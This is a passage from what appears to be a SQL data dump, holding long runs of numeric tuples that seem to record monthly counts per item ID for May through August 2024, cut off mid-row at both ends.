5',2),(4685,2,'202405',2),(4691,2,'202405',2),(4694,2,'202405',2),(4703,2,'202405',2),(4712,2,'202405',2),(4722,2,'202405',2),(4741,2,'202405',2),(4747,2,'202405',2),(4792,2,'202405',2),(4858,2,'202405',2),(4883,2,'202405',2),(4893,2,'202405',2),(4897,2,'202405',2),(4976,2,'202405',2),(5037,2,'202405',2),(5046,2,'202405',2),(5050,2,'202405',2),(5054,2,'202405',2),(5122,2,'202405',2),(5137,2,'202405',2),(5140,2,'202405',2),(5248,2,'202405',2),(5253,2,'202405',2),(5280,2,'202405',2),(5298,2,'202405',2),(5334,2,'202405',2),(5374,2,'202405',2),(5378,2,'202405',2),(467,2,'202405',3),(470,2,'202405',3),(472,2,'202405',3),(477,2,'202405',3),(479,2,'202405',3),(482,2,'202405',3),(487,2,'202405',3),(488,2,'202405',3),(1584,2,'202405',3),(1699,2,'202405',3),(1726,2,'202405',3),(1782,2,'202405',3),(2159,2,'202405',3),(2558,2,'202405',3),(2704,2,'202405',3),(2769,2,'202405',3),(2965,2,'202405',3),(2991,2,'202405',3),(2993,2,'202405',3),(3034,2,'202405',3),(3117,2,'202405',3),(3127,2,'202405',3),(3253,2,'202405',3),(3259,2,'202405',3),(3265,2,'202405',3),(3273,2,'202405',3),(3275,2,'202405',3),(3479,2,'202405',3),(3531,2,'202405',3),(3710,2,'202405',3),(3724,2,'202405',3),(3738,2,'202405',3),(4382,2,'202405',3),(4396,2,'202405',3),(4404,2,'202405',3),(4408,2,'202405',3),(4444,2,'202405',3),(4529,2,'202405',3),(4556,2,'202405',3),(4591,2,'202405',3),(4660,2,'202405',3),(4668,2,'202405',3),(4674,2,'202405',3),(4677,2,'202405',3),(4709,2,'202405',3),(4753,2,'202405',3),(4756,2,'202405',3),(4983,2,'202405',3),(4988,2,'202405',3),(5028,2,'202405',3),(5033,2,'202405',3),(5042,2,'202405',3),(5058,2,'202405',3),(5067,2,'202405',3),(5071,2,'202405',3),(5131,2,'202405',3),(5259,2,'202405',3),(5276,2,'202405',3),(5295,2,'202405',3),(5304,2,'202405',3),(5307,2,'202405',3),(5320,2,'202405',3),(5353,2,'202405',3),(5356,2,'202405',3),(74,2,'202405',4),(84,2,'202405',4),(91,2,'202405',4),(110,2,'202405',4),(471,2,'202405',4),(570,2,'202405',4),(1596,2,'202405',4),(1610,2,'202405',4),(1734,2,'202405',4),(1745,2,'202405',4),(1770,2,'202405',4),(2154,2,'202405',4),(2165,2,'202405',4),(2775,2,'202405',4),(2804,2,'202405',4),(3005,2,'202405',4),(3041,2,'202405',4),(3063,2,'202405',4),(3069,2,'202405',4),(3240,2,'202405',4),(3245,2,'202405',4),(3271,2,'202405',4),(3489,2,'202405',4),(3541,2,'202405',4),(4238,2,'202405',4),(4368,2,'202405',4),(4524,2,'202405',4),(4546,2,'202405',4),(4582,2,'202405',4),(4645,2,'202405',4),(4663,2,'202405',4),(4681,2,'202405',4),(4765,2,'202405',4),(5062,2,'202405',4),(5101,2,'202405',4),(5146,2,'202405',4),(5268,2,'202405',4),(5314,2,'202405',4),(5317,2,'202405',4),(335,2,'202405',5),(468,2,'202405',5),(474,2,'202405',5),(1594,2,'202405',5),(1732,2,'202405',5),(1766,2,'202405',5),(2457,2,'202405',5),(2503,2,'202405',5),(2801,2,'202405',5),(3030,2,'202405',5),(3087,2,'202405',5),(3267,2,'202405',5),(3285,2,'202405',5),(3498,2,'202405',5),(3714,2,'202405',5),(3742,2,'202405',5),(3746,2,'202405',5),(3749,2,'202405',5),(4323,2,'202405',5),(4551,2,'202405',5),(4750,2,'202405',5),(4762,2,'202405',5),(4930,2,'202405',5),(4977,2,'202405',5),(4996,2,'202405',5),(5359,2,'202405',5),(1590,2,'202405',6),(1701,2,'202405',6),(1776,2,'202405',6),(1780,2,'202405',6),(2152,2,'202405',6),(2156,2,'202405',6),(3104,2,'202405',6),(3438,2,'202405',6),(3764,2,'202405',6),(4412,2,'202405',6),(4776,2,'202405',6),(4802,2,'202405',6),(4862,2,'202405',6),(5020,2,'202405',6),(5128,2,'202405',6),(5264,2,'202405',6),(5323,2,'202405',6),(76,2,'202405',7),(473,2,'202405',7),(1608,2,'202405',7),(2956,2,'202405',7),(3045,2,'202405',7),(3251,2,'202405',7),(3261,2,'202405',7),(3313,2,'202405',7),(3752,2,'202405',7),(3777,2,'202405',7),(4329,2,'202405',7),(4420,2,'202405',7),(4457,2,'202405',7),(4697,2,'202405',7),(4744,2,'202405',7),(4866,2,'202405',7),(4980,2,'202405',7),(5024,2,'202405',7),(1604,2,'202405',8),(1614,2,'202405',8),(1724,2,'202405',8),(1728,2,'202405',8),(1743,2,'202405',8),(1747,2,'202405',8),(3083,2,'202405',8),(3107,2,'202405',8),(4874,2,'202405',8),(5134,2,'202405',8),(5301,2,'202405',8),(1711,2,'202405',9),(2751,2,'202405',9),(2809,2,'202405',9),(5289,2,'202405',9),(5292,2,'202405',9),(5310,2,'202405',9),(2904,2,'202405',10),(3004,2,'202405',10),(3023,2,'202405',10),(3771,2,'202405',10),(4301,2,'202405',10),(4416,2,'202405',10),(4688,2,'202405',10),(4759,2,'202405',10),(2063,2,'202405',11),(2813,2,'202405',11),(5080,2,'202405',11),(3249,2,'202405',12),(5163,2,'202405',12),(2609,2,'202405',13),(5076,2,'202405',13),(1544,2,'202405',14),(1602,2,'202405',14),(4771,2,'202405',14),(72,2,'202405',15),(89,2,'202405',17),(2309,2,'202405',17),(5125,2,'202405',18),(1600,2,'202405',20),(87,2,'202405',23),(3060,2,'202405',23),(1749,2,'202405',24),(3781,2,'202405',24),(4520,2,'202405',26),(1582,2,'202405',27),(1586,2,'202405',37),(2148,2,'202405',47),(3247,2,'202405',67),(68,2,'202405',76),(80,2,'202405',234),(9,2,'202405',41698),(102,2,'202406',1),(106,2,'202406',1),(487,2,'202406',1),(1610,2,'202406',1),(1701,2,'202406',1),(1713,2,'202406',1),(1732,2,'202406',1),(1739,2,'202406',1),(1774,2,'202406',1),(1780,2,'202406',1),(2252,2,'202406',1),(2801,2,'202406',1),(3107,2,'202406',1),(3265,2,'202406',1),(3267,2,'202406',1),(3269,2,'202406',1),(3727,2,'202406',1),(3774,2,'202406',1),(4368,2,'202406',1),(4387,2,'202406',1),(4436,2,'202406',1),(4556,2,'202406',1),(4608,2,'202406',1),(4744,2,'202406',1),(4753,2,'202406',1),(4874,2,'202406',1),(4977,2,'202406',1),(4980,2,'202406',1),(5033,2,'202406',1),(5042,2,'202406',1),(5153,2,'202406',1),(5248,2,'202406',1),(5271,2,'202406',1),(5298,2,'202406',1),(5323,2,'202406',1),(5374,2,'202406',1),(5378,2,'202406',1),(469,2,'202406',2),(470,2,'202406',2),(476,2,'202406',2),(477,2,'202406',2),(480,2,'202406',2),(481,2,'202406',2),(485,2,'202406',2),(488,2,'202406',2),(570,2,'202406',2),(1588,2,'202406',2),(1608,2,'202406',2),(1697,2,'202406',2),(1705,2,'202406',2),(1709,2,'202406',2),(1720,2,'202406',2),(1737,2,'202406',2),(1741,2,'202406',2),(1747,2,'202406',2),(1776,2,'202406',2),(2154,2,'202406',2),(2161,2,'202406',2),(2748,2,'202406',2),(2751,2,'202406',2),(2775,2,'202406',2),(2956,2,'202406',2),(2964,2,'202406',2),(2993,2,'202406',2),(3034,2,'202406',2),(3041,2,'202406',2),(3045,2,'202406',2),(3097,2,'202406',2),(3102,2,'202406',2),(3109,2,'202406',2),(3240,2,'202406',2),(3251,2,'202406',2),(3253,2,'202406',2),(3290,2,'202406',2),(3297,2,'202406',2),(3724,2,'202406',2),(3777,2,'202406',2),(4323,2,'202406',2),(4326,2,'202406',2),(4341,2,'202406',2),(4357,2,'202406',2),(4373,2,'202406',2),(4377,2,'202406',2),(4382,2,'202406',2),(4396,2,'202406',2),(4428,2,'202406',2),(4517,2,'202406',2),(4542,2,'202406',2),(4546,2,'202406',2),(4582,2,'202406',2),(4677,2,'202406',2),(4685,2,'202406',2),(4688,2,'202406',2),(4691,2,'202406',2),(4694,2,'202406',2),(4697,2,'202406',2),(4700,2,'202406',2),(4706,2,'202406',2),(4712,2,'202406',2),(4747,2,'202406',2),(4750,2,'202406',2),(4762,2,'202406',2),(4771,2,'202406',2),(4792,2,'202406',2),(4888,2,'202406',2),(4893,2,'202406',2),(4897,2,'202406',2),(4930,2,'202406',2),(4976,2,'202406',2),(4988,2,'202406',2),(5054,2,'202406',2),(5062,2,'202406',2),(5125,2,'202406',2),(5134,2,'202406',2),(5253,2,'202406',2),(5264,2,'202406',2),(5268,2,'202406',2),(5280,2,'202406',2),(5304,2,'202406',2),(5307,2,'202406',2),(5320,2,'202406',2),(5326,2,'202406',2),(5330,2,'202406',2),(5353,2,'202406',2),(76,2,'202406',3),(472,2,'202406',3),(474,2,'202406',3),(482,2,'202406',3),(486,2,'202406',3),(1584,2,'202406',3),(1612,2,'202406',3),(1699,2,'202406',3),(1722,2,'202406',3),(1745,2,'202406',3),(1768,2,'202406',3),(1772,2,'202406',3),(2063,2,'202406',3),(2150,2,'202406',3),(2156,2,'202406',3),(2248,2,'202406',3),(2296,2,'202406',3),(2558,2,'202406',3),(2991,2,'202406',3),(3072,2,'202406',3),(3087,2,'202406',3),(3090,2,'202406',3),(3092,2,'202406',3),(3096,2,'202406',3),(3229,2,'202406',3),(3257,2,'202406',3),(3263,2,'202406',3),(3275,2,'202406',3),(3278,2,'202406',3),(3280,2,'202406',3),(3282,2,'202406',3),(3285,2,'202406',3),(3287,2,'202406',3),(3307,2,'202406',3),(3313,2,'202406',3),(3316,2,'202406',3),(3438,2,'202406',3),(3479,2,'202406',3),(3482,2,'202406',3),(3486,2,'202406',3),(3534,2,'202406',3),(3731,2,'202406',3),(3742,2,'202406',3),(4275,2,'202406',3),(4301,2,'202406',3),(4335,2,'202406',3),(4404,2,'202406',3),(4408,2,'202406',3),(4424,2,'202406',3),(4432,2,'202406',3),(4444,2,'202406',3),(4454,2,'202406',3),(4566,2,'202406',3),(4612,2,'202406',3),(4651,2,'202406',3),(4657,2,'202406',3),(4660,2,'202406',3),(4663,2,'202406',3),(4674,2,'202406',3),(4681,2,'202406',3),(4741,2,'202406',3),(4756,2,'202406',3),(4802,2,'202406',3),(4870,2,'202406',3),(4878,2,'202406',3),(5028,2,'202406',3),(5037,2,'202406',3),(5058,2,'202406',3),(5128,2,'202406',3),(5256,2,'202406',3),(5259,2,'202406',3),(5289,2,'202406',3),(5295,2,'202406',3),(5317,2,'202406',3),(5334,2,'202406',3),(467,2,'202406',4),(471,2,'202406',4),(1592,2,'202406',4),(1604,2,'202406',4),(1703,2,'202406',4),(1715,2,'202406',4),(1726,2,'202406',4),(1743,2,'202406',4),(1782,2,'202406',4),(2704,2,'202406',4),(2813,2,'202406',4),(3038,2,'202406',4),(3063,2,'202406',4),(3069,2,'202406',4),(3083,2,'202406',4),(3104,2,'202406',4),(3273,2,'202406',4),(3430,2,'202406',4),(3498,2,'202406',4),(3541,2,'202406',4),(3721,2,'202406',4),(3752,2,'202406',4),(4529,2,'202406',4),(4587,2,'202406',4),(4591,2,'202406',4),(4645,2,'202406',4),(4648,2,'202406',4),(4703,2,'202406',4),(4709,2,'202406',4),(4768,2,'202406',4),(4883,2,'202406',4),(5046,2,'202406',4),(5101,2,'202406',4),(5122,2,'202406',4),(5137,2,'202406',4),(5163,2,'202406',4),(5359,2,'202406',4),(5363,2,'202406',4),(110,2,'202406',5),(479,2,'202406',5),(1707,2,'202406',5),(1728,2,'202406',5),(1734,2,'202406',5),(2178,2,'202406',5),(2297,2,'202406',5),(2457,2,'202406',5),(2503,2,'202406',5),(2617,2,'202406',5),(2658,2,'202406',5),(2804,2,'202406',5),(3006,2,'202406',5),(3259,2,'202406',5),(3531,2,'202406',5),(3738,2,'202406',5),(4238,2,'202406',5),(4329,2,'202406',5),(4668,2,'202406',5),(4862,2,'202406',5),(5024,2,'202406',5),(5067,2,'202406',5),(5146,2,'202406',5),(5310,2,'202406',5),(5356,2,'202406',5),(91,2,'202406',6),(108,2,'202406',6),(335,2,'202406',6),(468,2,'202406',6),(473,2,'202406',6),(1594,2,'202406',6),(1614,2,'202406',6),(1751,2,'202406',6),(2159,2,'202406',6),(2769,2,'202406',6),(2809,2,'202406',6),(2965,2,'202406',6),(3030,2,'202406',6),(3079,2,'202406',6),(3226,2,'202406',6),(3261,2,'202406',6),(3710,2,'202406',6),(3714,2,'202406',6),(3735,2,'202406',6),(4332,2,'202406',6),(4797,2,'202406',6),(4858,2,'202406',6),(4866,2,'202406',6),(5071,2,'202406',6),(5131,2,'202406',6),(5140,2,'202406',6),(5292,2,'202406',6),(5314,2,'202406',6),(72,2,'202406',7),(1695,2,'202406',7),(1711,2,'202406',7),(1718,2,'202406',7),(1724,2,'202406',7),(1730,2,'202406',7),(2904,2,'202406',7),(2911,2,'202406',7),(3117,2,'202406',7),(3124,2,'202406',7),(3489,2,'202406',7),(3771,2,'202406',7),(4363,2,'202406',7),(4400,2,'202406',7),(4416,2,'202406',7),(4524,2,'202406',7),(4551,2,'202406',7),(4765,2,'202406',7),(4983,2,'202406',7),(5050,2,'202406',7),(74,2,'202406',8),(1590,2,'202406',8),(1596,2,'202406',8),(2989,2,'202406',8),(3005,2,'202406',8),(3027,2,'202406',8),(4391,2,'202406',8),(4440,2,'202406',8),(4654,2,'202406',8),(4996,2,'202406',8),(5080,2,'202406',8),(5157,2,'202406',8),(1600,2,'202406',9),(1606,2,'202406',9),(3004,2,'202406',9),(3066,2,'202406',9),(3243,2,'202406',9),(3245,2,'202406',9),(1544,2,'202406',10),(1602,2,'202406',10),(2152,2,'202406',10),(4412,2,'202406',10),(4776,2,'202406',10),(5301,2,'202406',10),(1582,2,'202406',11),(1598,2,'202406',11),(2309,2,'202406',11),(4420,2,'202406',11),(4457,2,'202406',11),(4514,2,'202406',11),(4759,2,'202406',11),(84,2,'202406',12),(2165,2,'202406',13),(4338,2,'202406',13),(1770,2,'202406',14),(2293,2,'202406',14),(4722,2,'202406',14),(4448,2,'202406',15),(5076,2,'202406',15),(4520,2,'202406',16),(5276,2,'202406',16),(3023,2,'202406',17),(1749,2,'202406',18),(3746,2,'202406',19),(1766,2,'202406',20),(3749,2,'202406',20),(2609,2,'202406',21),(3127,2,'202406',22),(89,2,'202406',26),(3249,2,'202406',26),(87,2,'202406',28),(3060,2,'202406',30),(1586,2,'202406',32),(2148,2,'202406',45),(3781,2,'202406',47),(3764,2,'202406',85),(68,2,'202406',143),(3247,2,'202406',168),(80,2,'202406',244),(9,2,'202406',35309),(106,2,'202407',1),(110,2,'202407',1),(470,2,'202407',1),(471,2,'202407',1),(472,2,'202407',1),(476,2,'202407',1),(479,2,'202407',1),(1584,2,'202407',1),(1590,2,'202407',1),(1604,2,'202407',1),(1695,2,'202407',1),(1699,2,'202407',1),(1707,2,'202407',1),(1709,2,'202407',1),(1713,2,'202407',1),(1718,2,'202407',1),(1722,2,'202407',1),(1726,2,'202407',1),(1734,2,'202407',1),(1739,2,'202407',1),(1741,2,'202407',1),(1745,2,'202407',1),(1747,2,'202407',1),(1751,2,'202407',1),(1768,2,'202407',1),(1776,2,'202407',1),(1780,2,'202407',1),(1782,2,'202407',1),(2150,2,'202407',1),(2152,2,'202407',1),(2156,2,'202407',1),(2159,2,'202407',1),(2178,2,'202407',1),(2297,2,'202407',1),(2609,2,'202407',1),(2704,2,'202407',1),(2751,2,'202407',1),(2775,2,'202407',1),(2964,2,'202407',1),(2991,2,'202407',1),(2993,2,'202407',1),(3087,2,'202407',1),(3096,2,'202407',1),(3102,2,'202407',1),(3104,2,'202407',1),(3226,2,'202407',1),(3229,2,'202407',1),(3240,2,'202407',1),(3243,2,'202407',1),(3245,2,'202407',1),(3253,2,'202407',1),(3257,2,'202407',1),(3259,2,'202407',1),(3265,2,'202407',1),(3267,2,'202407',1),(3269,2,'202407',1),(3271,2,'202407',1),(3275,2,'202407',1),(3280,2,'202407',1),(3285,2,'202407',1),(3498,2,'202407',1),(3714,2,'202407',1),(3735,2,'202407',1),(3777,2,'202407',1),(4357,2,'202407',1),(4373,2,'202407',1),(4387,2,'202407',1),(4396,2,'202407',1),(4408,2,'202407',1),(4424,2,'202407',1),(4428,2,'202407',1),(4440,2,'202407',1),(4444,2,'202407',1),(4448,2,'202407',1),(4514,2,'202407',1),(4546,2,'202407',1),(4608,2,'202407',1),(4677,2,'202407',1),(4681,2,'202407',1),(4685,2,'202407',1),(4750,2,'202407',1),(4792,2,'202407',1),(4797,2,'202407',1),(4802,2,'202407',1),(4858,2,'202407',1),(4862,2,'202407',1),(4870,2,'202407',1),(4874,2,'202407',1),(4878,2,'202407',1),(4883,2,'202407',1),(4888,2,'202407',1),(4893,2,'202407',1),(4897,2,'202407',1),(5024,2,'202407',1),(5028,2,'202407',1),(5033,2,'202407',1),(5042,2,'202407',1),(5050,2,'202407',1),(5054,2,'202407',1),(5062,2,'202407',1),(5067,2,'202407',1),(5071,2,'202407',1),(5140,2,'202407',1),(5146,2,'202407',1),(5248,2,'202407',1),(5268,2,'202407',1),(5280,2,'202407',1),(5353,2,'202407',1),(5363,2,'202407',1),(5378,2,'202407',1),(108,2,'202407',2),(468,2,'202407',2),(474,2,'202407',2),(478,2,'202407',2),(482,2,'202407',2),(488,2,'202407',2),(1608,2,'202407',2),(1612,2,'202407',2),(1614,2,'202407',2),(1711,2,'202407',2),(1715,2,'202407',2),(1732,2,'202407',2),(1737,2,'202407',2),(1774,2,'202407',2),(2248,2,'202407',2),(2293,2,'202407',2),(2296,2,'202407',2),(2558,2,'202407',2),(2801,2,'202407',2),(2989,2,'202407',2),(3006,2,'202407',2),(3027,2,'202407',2),(3034,2,'202407',2),(3038,2,'202407',2),(3072,2,'202407',2),(3083,2,'202407',2),(3092,2,'202407',2),(3107,2,'202407',2),(3124,2,'202407',2),(3251,2,'202407',2),(3261,2,'202407',2),(3273,2,'202407',2),(3278,2,'202407',2),(3297,2,'202407',2),(3489,2,'202407',2),(3531,2,'202407',2),(3541,2,'202407',2),(3721,2,'202407',2),(3724,2,'202407',2),(3731,2,'202407',2),(3738,2,'202407',2),(4275,2,'202407',2),(4329,2,'202407',2),(4332,2,'202407',2),(4368,2,'202407',2),(4391,2,'202407',2),(4400,2,'202407',2),(4404,2,'202407',2),(4432,2,'202407',2),(4542,2,'202407',2),(4587,2,'202407',2),(4648,2,'202407',2),(4651,2,'202407',2),(4703,2,'202407',2),(4709,2,'202407',2),(4756,2,'202407',2),(4762,2,'202407',2),(4866,2,'202407',2),(4930,2,'202407',2),(4977,2,'202407',2),(4980,2,'202407',2),(4988,2,'202407',2),(5020,2,'202407',2),(5134,2,'202407',2),(5153,2,'202407',2),(5253,2,'202407',2),(5259,2,'202407',2),(5289,2,'202407',2),(5298,2,'202407',2),(5304,2,'202407',2),(5317,2,'202407',2),(5330,2,'202407',2),(5334,2,'202407',2),(5383,2,'202407',2),(84,2,'202407',3),(91,2,'202407',3),(335,2,'202407',3),(570,2,'202407',3),(1701,2,'202407',3),(1720,2,'202407',3),(1724,2,'202407',3),(2063,2,'202407',3),(2252,2,'202407',3),(2658,2,'202407',3),(2804,2,'202407',3),(3079,2,'202407',3),(3287,2,'202407',3),(3290,2,'202407',3),(3486,2,'202407',3),(3727,2,'202407',3),(4238,2,'202407',3),(4323,2,'202407',3),(4326,2,'202407',3),(4436,2,'202407',3),(4457,2,'202407',3),(4517,2,'202407',3),(4520,2,'202407',3),(4556,2,'202407',3),(4566,2,'202407',3),(4654,2,'202407',3),(4657,2,'202407',3),(4660,2,'202407',3),(4663,2,'202407',3),(4668,2,'202407',3),(4688,2,'202407',3),(4691,2,'202407',3),(4741,2,'202407',3),(4771,2,'202407',3),(5037,2,'202407',3),(5058,2,'202407',3),(5157,2,'202407',3),(5256,2,'202407',3),(5292,2,'202407',3),(5307,2,'202407',3),(5314,2,'202407',3),(5356,2,'202407',3),(5359,2,'202407',3),(102,2,'202407',4),(467,2,'202407',4),(487,2,'202407',4),(1588,2,'202407',4),(2154,2,'202407',4),(3004,2,'202407',4),(3066,2,'202407',4),(3282,2,'202407',4),(3313,2,'202407',4),(3479,2,'202407',4),(3771,2,'202407',4),(4335,2,'202407',4),(4454,2,'202407',4),(4524,2,'202407',4),(4529,2,'202407',4),(4582,2,'202407',4),(4612,2,'202407',4),(4700,2,'202407',4),(4712,2,'202407',4),(4722,2,'202407',4),(5131,2,'202407',4),(5271,2,'202407',4),(5301,2,'202407',4),(5320,2,'202407',4),(5326,2,'202407',4),(473,2,'202407',5),(1600,2,'202407',5),(1770,2,'202407',5),(2965,2,'202407',5),(3023,2,'202407',5),(3482,2,'202407',5),(4363,2,'202407',5),(4377,2,'202407',5),(4382,2,'202407',5),(4551,2,'202407',5),(4706,2,'202407',5),(4744,2,'202407',5),(4759,2,'202407',5),(4983,2,'202407',5),(5046,2,'202407',5),(5080,2,'202407',5),(5137,2,'202407',5),(5163,2,'202407',5),(5310,2,'202407',5),(89,2,'202407',6),(1592,2,'202407',6),(1743,2,'202407',6),(2503,2,'202407',6),(2813,2,'202407',6),(2956,2,'202407',6),(3005,2,'202407',6),(3430,2,'202407',6),(3746,2,'202407',6),(3774,2,'202407',6),(4341,2,'202407',6),(4674,2,'202407',6),(5125,2,'202407',6),(5128,2,'202407',6),(5276,2,'202407',6),(469,2,'202407',7),(1596,2,'202407',7),(1602,2,'202407',7),(1697,2,'202407',7),(1703,2,'202407',7),(1728,2,'202407',7),(1749,2,'202407',7),(1772,2,'202407',7),(2165,2,'202407',7),(2769,2,'202407',7),(3249,2,'202407',7),(4338,2,'202407',7),(4765,2,'202407',7),(4996,2,'202407',7),(74,2,'202407',8),(2457,2,'202407',8),(4416,2,'202407',8),(4591,2,'202407',8),(4694,2,'202407',8),(4747,2,'202407',8),(1594,2,'202407',9),(1610,2,'202407',9),(1705,2,'202407',9),(2309,2,'202407',9),(2904,2,'202407',9),(3069,2,'202407',9),(3263,2,'202407',9),(5264,2,'202407',9),(5295,2,'202407',9),(1544,2,'202407',10),(1766,2,'202407',10),(2161,2,'202407',10),(4412,2,'202407',10),(72,2,'202407',11),(1778,2,'202407',11),(3030,2,'202407',11),(4776,2,'202407',11),(5076,2,'202407',11),(3109,2,'202407',12),(4420,2,'202407',12),(5374,2,'202407',12),(4645,2,'202407',13),(3127,2,'202407',14),(1598,2,'202407',16),(1582,2,'202407',17),(2809,2,'202407',18),(3764,2,'202407',19),(3060,2,'202407',21),(3534,2,'202407',25),(3749,2,'202407',28),(87,2,'202407',29),(1586,2,'202407',32),(3781,2,'202407',41),(2148,2,'202407',46),(3247,2,'202407',54),(68,2,'202407',148),(80,2,'202407',249),(9,2,'202407',34619),(106,2,'202408',1),(1697,2,'202408',1),(1701,2,'202408',1),(1739,2,'202408',1),(3063,2,'202408',1),(3066,2,'202408',1),(3090,2,'202408',1),(3097,2,'202408',1),(3127,2,'202408',1),(3313,2,'202408',1),(3486,2,'202408',1),(3731,2,'202408',1),(3742,2,'202408',1),(3774,2,'202408',1),(4275,2,'202408',1),(4341,2,'202408',1),(4744,2,'202408',1),(4747,2,'202408',1),(4753,2,'202408',1),(4878,2,'202408',1),(5042,2,'202408',1),(5134,2,'202408',1),(5320,2,'202408',1),(5323,2,'202408',1),(5334,2,'202408',1),(108,2,'202408',2),(1709,2,'202408',2),(1726,2,'202408',2),(1741,2,'202408',2),(2159,2,'202408',2),(2296,2,'202408',2),(2558,2,'202408',2),(2658,2,'202408',2),(2704,2,'202408',2),(2809,2,'202408',2),(2956,2,'202408',2),(3027,2,'202408',2),(3045,2,'202408',2),(3072,2,'202408',2),(3083,2,'202408',2),(3124,2,'202408',2),(3253,2,'202408',2),(3282,2,'202408',2),(3307,2,'202408',2),(3430,2,'202408',2),(3438,2,'202408',2),(3777,2,'202408',2),(4373,2,'202408',2),(4382,2,'202408',2),(4387,2,'202408',2),(4404,2,'202408',2),(4408,2,'202408',2),(4428,2,'202408',2),(4514,2,'202408',2),(4520,2,'202408',2),(4556,2,'202408',2),(4648,2,'202408',2),(4651,2,'202408',2),(4688,2,'202408',2),(4703,2,'202408',2),(4741,2,'202408',2),(4797,2,'202408',2),(4802,2,'202408',2),(4862,2,'202408',2),(4874,2,'202408',2),(4883,2,'202408',2),(4977,2,'202408',2),(4980,2,'202408',2),(5028,2,'202408',2),(5253,2,'202408',2),(5259,2,'202408',2),(5268,2,'202408',2),(5280,2,'202408',2),(5289,2,'202408',2),(5292,2,'202408',2),(5295,2,'202408',2),(5298,2,'202408',2),(5301,2,'202408',2),(5304,2,'202408',2),(5307,2,'202408',2),(5310,2,'202408',2),(5356,2,'202408',2),(5378,2,'202408',2),(5383,2,'202408',2),(1584,2,'202408',3),(1606,2,'202408',3),(1612,2,'202408',3),(1707,2,'202408',3),(1722,2,'202408',3),(1724,2,'202408',3),(1747,2,'202408',3),(1772,2,'202408',3),(1778,2,'202408',3),(2150,2,'202408',3),(2989,2,'202408',3),(2993,2,'202408',3),(3229,2,'202408',3),(3249,2,'202408',3),(3269,2,'202408',3),(3271,2,'202408',3),(3280,2,'202408',3),(3489,2,'202408',3),(3714,2,'202408',3),(3724,2,'202408',3),(3727,2,'202408',3),(3735,2,'202408',3),(3752,2,'202408',3),(4326,2,'202408',3),(4338,2,'202408',3),(4400,2,'202408',3),(4440,2,'202408',3),(4448,2,'202408',3),(4517,2,'202408',3),(4608,2,'202408',3),(4645,2,'202408',3),(4674,2,'202408',3),(4691,2,'202408',3),(4722,2,'202408',3),(4756,2,'202408',3),(4768,2,'202408',3),(4988,2,'202408',3),(5020,2,'202408',3),(5050,2,'202408',3),(5157,2,'202408',3),(5163,2,'202408',3),(5271,2,'202408',3),(5317,2,'202408',3),(5326,2,'202408',3),(5363,2,'202408',3),(5374,2,'202408',3),(102,2,'202408',4),(476,2,'202408',4),(488,2,'202408',4),(1695,2,'202408',4),(1703,2,'202408',4),(1705,2,'202408',4),(1713,2,'202408',4),(1715,2,'202408',4),(1734,2,'202408',4),(1737,2,'202408',4),(1745,2,'202408',4),(1751,2,'202408',4),(1768,2,'202408',4),(1782,2,'202408',4),(2248,2,'202408',4),(2813,2,'202408',4),(2911,2,'202408',4),(3034,2,'202408',4),(3107,2,'202408',4),(3240,2,'202408',4),(3251,2,'202408',4),(3259,2,'202408',4),(3267,2,'202408',4),(3273,2,'202408',4),(3479,2,'202408',4),(3498,2,'202408',4),(3710,2,'202408',4),(4332,2,'202408',4),(4424,2,'202408',4),(4436,2,'202408',4),(4524,2,'202408',4),(4529,2,'202408',4),(4591,2,'202408',4),(4657,2,'202408',4),(4685,2,'202408',4),(4706,2,'202408',4),(4762,2,'202408',4),(4792,2,'202408',4),(4858,2,'202408',4),(4976,2,'202408',4),(5058,2,'202408',4),(5080,2,'202408',4),(5101,2,'202408',4),(5125,2,'202408',4),(5153,2,'202408',4),(5248,2,'202408',4),(74,2,'202408',5),(76,2,'202408',5),(110,2,'202408',5),(480,2,'202408',5),(570,2,'202408',5),(1604,2,'202408',5),(1732,2,'202408',5),(2156,2,'202408',5),(2297,2,'202408',5),(2748,2,'202408',5),(2769,2,'202408',5),(3006,2,'202408',5),(3038,2,'202408',5),(3041,2,'202408',5),(3069,2,'202408',5),(3087,2,'202408',5),(3109,2,'202408',5),(3117,2,'202408',5),(3245,2,'202408',5),(3285,2,'202408',5),(3738,2,'202408',5),(3746,2,'202408',5),(3771,2,'202408',5),(4357,2,'202408',5),(4432,2,'202408',5),(4454,2,'202408',5),(4566,2,'202408',5),(4681,2,'202408',5),(4697,2,'202408',5),(4700,2,'202408',5),(4750,2,'202408',5),(4866,2,'202408',5),(4897,2,'202408',5),(5024,2,'202408',5),(5033,2,'202408',5),(5067,2,'202408',5),(5071,2,'202408',5),(5137,2,'202408',5),(5256,2,'202408',5),(5264,2,'202408',5),(5314,2,'202408',5),(5359,2,'202408',5),(84,2,'202408',6),(1720,2,'202408',6),(1780,2,'202408',6),(2063,2,'202408',6),(2154,2,'202408',6),(2609,2,'202408',6),(2751,2,'202408',6),(3023,2,'202408',6),(3079,2,'202408',6),(3257,2,'202408',6),(3261,2,'202408',6),(3265,2,'202408',6),(3297,2,'202408',6),(3531,2,'202408',6),(4377,2,'202408',6),(4551,2,'202408',6),(4612,2,'202408',6),(4654,2,'202408',6),(4660,2,'202408',6),(4668,2,'202408',6),(4677,2,'202408',6),(4694,2,'202408',6),(4712,2,'202408',6),(4776,2,'202408',6),(4870,2,'202408',6),(5046,2,'202408',6),(5122,2,'202408',6),(5128,2,'202408',6),(5276,2,'202408',6),(91,2,'202408',7),(335,2,'202408',7),(469,2,'202408',7),(484,2,'202408',7),(1608,2,'202408',7),(1610,2,'202408',7),(2165,2,'202408',7),(2178,2,'202408',7),(2804,2,'202408',7),(3004,2,'202408',7),(3278,2,'202408',7),(3316,2,'202408',7),(3721,2,'202408',7),(4238,2,'202408',7),(4323,2,'202408',7),(4335,2,'202408',7),(4663,2,'202408',7),(4759,2,'202408',7),(87,2,'202408',8),(470,2,'202408',8),(472,2,'202408',8),(474,2,'202408',8),(485,2,'202408',8),(1592,2,'202408',8),(1699,2,'202408',8),(1718,2,'202408',8),(1728,2,'202408',8),(1730,2,'202408',8),(1766,2,'202408',8),(2293,2,'202408',8),(2503,2,'202408',8),(3102,2,'202408',8),(3226,2,'202408',8),(3243,2,'202408',8),(3290,2,'202408',8),(4368,2,'202408',8),(4391,2,'202408',8),(4396,2,'202408',8),(4444,2,'202408',8),(4542,2,'202408',8),(4546,2,'202408',8),(4893,2,'202408',8),(4983,2,'202408',8),(5330,2,'202408',8),(467,2,'202408',9),(478,2,'202408',9),(482,2,'202408',9),(483,2,'202408',9),(486,2,'202408',9),(1588,2,'202408',9),(1614,2,'202408',9),(2152,2,'202408',9),(2801,2,'202408',9),(2904,2,'202408'